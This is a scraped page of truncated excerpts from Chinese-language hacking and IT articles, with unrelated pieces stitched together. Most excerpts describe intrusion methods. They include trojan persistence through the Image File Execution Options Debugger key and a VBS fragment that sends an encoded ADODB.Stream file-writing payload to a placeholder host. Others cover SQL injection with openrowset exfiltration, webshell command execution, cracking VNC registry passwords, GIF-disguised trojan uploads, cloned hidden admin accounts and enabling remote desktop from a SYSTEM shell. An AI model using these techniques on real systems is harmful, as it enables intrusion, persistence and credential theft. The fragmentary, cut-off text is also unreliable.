其他

 來源：http://www.hackerxfiles.net/首先檢查是否在你的機器上安裝了GCC，使用命令： 可用rpm -q gcc　檢查。如果沒有安裝，請依序檢查並安裝下面各RPM 　libbinutils binutils make glibc-devel gcc-cpp gcc 看下面的例子：test.c#include<stdio.h>main(){ char *str="I like Linux! I advices you jion in the Linux

我們知道，有些木馬是通過修改exe的檔案關聯來實現隨EXE程式啟動的。今天我在網上看到有另外一個顯為人知的方法，就是通過在註冊表HKEY_LOCAL_MACHINE/SOFTWARE /Microsoft/Windows NT/ CurrentVersion/Image File Execution Options 下建立一個登錄機碼，項名為A.exe，然後在下面建立一個字串，字串名為Debugger，字串值就是程式B.exe的全路徑。

 來源：PConline 先分析入侵者都做了些什麼！ 　　記得為了方便在他機器上裝了RADMIN.登陸了一下.密碼也不對了.看來是有人上去了.而且入侵者還拿到了系統管理員許可權 　　跑到機房.拿出ERD

with wscriptif .arguments.count<2 then .quitffn=replace(.arguments(1),"/","%5C"):ffn=replace(ffn,":","%3A"):ffn=replace(ffn,"~","%7E")url= "http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0

    畢業了，幾多失落，幾多歡喜。 無語。曾經的紅盟，黑盟，鷹盟，已經典不再。孩童般的遊戲不能繼續下去，ToolHacker遍地是，忽想曾火遍大江南北的一句台詞：”一點技術含量也沒有“ 。的確，就知道拿些別人寫的EXP編譯後炫耀，有沒有想過自己什麼時候出幾個EXP？？ 畸形的教育，金錢的誘惑，麻木的社會，落後的思想，盲目的追求使我失去了許多許多.     強技術方能強國，重思想方能救國。|社會如此，我能怎樣。| 

作者:瘋狗   http://www.cnbct.org/得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB裡跑一圈,發現屏蔽了SQL錯誤資訊,得不到實體路徑,那還寫個PP馬了.聯想到一個許可權不是很高的命令openrowset,進行跨程式庫伺服器查詢,就是把一個SQL命令發送到遠端資料庫,然後看返回的結果,但是要啟動事件跟蹤!我們可以把網站資訊寫入資料庫,然後%$^%$@#$@^%$~首先在自己機器建立SQL資料庫 然後在對方機器上建立個表 create table

對於國內外的很多新聞，BBS和電子商務網站都採用ASP+SQL設計，而寫 ASP的程式員很多（有很多剛剛畢業的），所以，ASP+SQL的攻擊成功率也比較高。這類攻擊方法與NT的版本和SQL的版本沒有多大的關係，也沒有相應的補丁，因為漏洞是程式員自己造成的，而且大多數講解ASP編程的書上，原始碼例子就有這個漏洞存在，其實只是一些合法的ASP對SQL的請求，就留下後患無窮！

有很多朋友問他得到了一個WEBSHELL,但是想用命令提示查看使用者資訊什麼的,但是很多主機限制了執行命令,所以很多WEBSHELL就不能失去了很大的功能......前二天桂林老兵ASP站長助手6.0剛出來，我就以ASP站長助手6.0為例把它上傳到一個禁止執行的虛擬機器主機，然後上傳一個CMD.exe，然後調用你上傳的CMD來執行命令...... 本來想搞圖文教程的，但感覺太簡單，文字就可以說明清楚了 1.開啟ASP站長助手6.0點擊命令提示字元，顯示"沒有許可權"

文/圖  勇哥兒大家都知道，注入方式主要有數字型和字元型，但新手們常常忽略搜尋型，因為搜尋型在判斷是否存在漏洞時要在搜尋文字框中輸入內容，然後再根據返回的頁面內容來判斷，比較煩瑣。雖然NBSI2帶有這種注入方式，但在開啟頁面的時候參數中一般是不帶有搜尋的參數的，怎麼辦呢？我的辦法是手工改造它，然後再用NBSI2幫忙。先給大家講點前置知識，假如你只打算取出name記錄，而且這些記錄的名字必須以字母w打頭，那麼你就要用到下面的WHERE子句了： SELECT name FROM Admin

作者:小花很多時候大家提升許可權一般用SERVU，或是找到sa帳戶密碼等。其實除了這個VNC一般也是以最高許可權啟動並執行，而且是圖形介面，功能和遠程終端類似。如果得到了一個主機的WEBSHELL，想提升許可權，發現主機運行了VNC服務，就可以考慮用下面的方法。預設情況下VNC服務端的密碼是放在註冊表中的，本文只針對這種情況。首先用ASP讀出註冊表中的加密密碼，然後用破解工具破解。我給出大家一個讀取VNC密碼的ASP指令碼，預設情況下VNC密碼存放在HKCU/Software/ORL/WinVN

路由器在電腦網路中有著舉足輕重的地位，是電腦網路的橋樑。通過它不僅可以連通不同的網路，還能選擇資料傳送的路徑，並能阻隔非法的訪問。 路由器的配置對初學者來說，並不是件十分容易的事。現將路由器的一般配置和簡單調試介紹給大家，供朋友們在配置路由器時參考，本文以Cisco2501為例。 Cisco2501有一個乙太網路口（AUI）、一個Console口（RJ45）、一個AUX口（RJ45）和兩個同步串口，支援DTE和DCE裝置，支援 EIA/TIA-232、 EIA/TIA-449、 V.35 、X.

 來源:http://blog.csdn.net/angelz/1.清空日誌 DUMP  TRANSACTION  庫名  WITH  NO_LOG    2.收縮資料庫檔案(如果不壓縮,資料庫的檔案不會減小 企業管理器--右鍵你要壓縮的資料庫--所有任務--收縮資料庫--收縮檔案  --選擇記錄檔--在收縮方式裡選擇收縮至XXM,這裡會給出一個允許收縮到的最小M數,直接輸入這個數,確定就可以了 

本文要告訴您的是：三層交換器的技術含量很高，不但“看起來很美”，而且使用起來也很美！那麼，在校園網、城域教育網構建過程中三層交換器究竟具有什麼樣的作用？三層交換器能為我們提供什麼樣的服務？它能給我們帶來什麼好處呢？為了很好地解答這個問題，我們特別邀請了三層交換器的專家和學校老師進行了共同探討，最後得到了令人滿意的答案，請大家細細地品味吧。

按照提示存為t.vbs檔案，在cmd視窗中輸入cscript t.vbs [參數]就可以了。如果想移植到vb下，把wscript.echo替換成debug.pring或者其他的輸出函數就可以了'function: ' list all process or kill one of them'parameter:  NameorPID process's name or pid'return: ' true if kill one process, else falseFunction KillP

常用Windows9x的朋友一定對Rundll32.exe和Rundll.exe這兩個檔案不會陌生吧，不過,由於這兩個程式的功能原先只限於在微軟內部使用，因而真正知道如何使用它們的朋友想必不多。那麼好，如果你還不清楚的話，那麼就讓我來告訴你吧。     首先，請你做個小實驗（請事先儲存好你正在執行的程式的結果，否則...）：點擊“開始－程式－Ms－Dos方式”，進入Dos視窗，然後鍵入rundll32.exe user.exe,restartwindows，再按下斷行符號鍵，這時你將看到，機器被

目前軟交換在移動網中的引入也是分步驟發展的首先提供的是：　　---Tandem的功能　　在這種情況下他與固定網的軟交換、媒體網關應用模式基本一樣，主要解決移動網與固定網之間的IP互連。軟交換還沒有移動性的功能，無法支撐面向移動領域的業務。　　---GMSC (Gateway MSC)　　軟交換的地位相當於Gateway MSC，具有移動性概念，和HLR通過MAP/IS41介面，定位移動使用者，支援新的移動性業務。　　---VMSC (Visited or Serving

<HTML><HEAD><TITLE>SQL Server 資料庫的備份與恢複</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"></HEAD><BODY><form method="post" name=myform>選擇操作：<INPUT TYPE="radio" NAME="act" id=

文章編輯:NetHacking 來源：http://www.powers.com.cn 作者:喜歡憂傷背景：(1)動網上傳檔案，備份得到後門(2)使用GIF89a可以上傳內容為木馬的gif圖片：逃過頭像上傳的檢測。所以產生了新的方法：上傳gif頭像圖片，備份得到木馬了。(使用範圍為:動網7.1以前的版本)但是很多人在執行後門後出現的是一張不能顯示的圖片．偶還是公布一下我用了恩久的更方便的方法，同時解釋一下為什麼會出現這種情況．：就是GIF89a加站長助手，運行後門的時候看到的就是站長助手的介面，

 作者：LOOO　來源：http://www.looooo.info/幾句廢話：黑基發了我的複製帳戶之終結篇後，很多朋友對我文章提出了寶貴意見．由於原文是自己無聊時隨便寫的，很多地方不夠嚴謹．於是我重新整理了此文，補充了一些資料，修改了不夠嚴謹的地方，　有問題歡迎來我blog上探討．序：相信大家都用過複製帳戶吧。無論是用工具還是用手工，複製帳戶無疑是隱藏帳戶的最好選擇。但是看見網上的文章都講的特別麻煩。這樣那樣的。其實複製帳戶很簡單。就是複製administrator的登錄機碼。本篇文章針對已經

不須上傳任何檔案開啟終端的方法適合win2k,xp,2003.本文前提是已經通過某種方法得到了對方的一個SYSTEM許可權的CMDSHELL~~在無須傳任何檔案的情況下開啟終端服務。一、win 2k下終端開啟終端首先用ECHO寫一個3389.reg檔案,然後匯入到註冊表，echo代碼如下：echo Windows Registry Editor Version 5.00 >>3389.regecho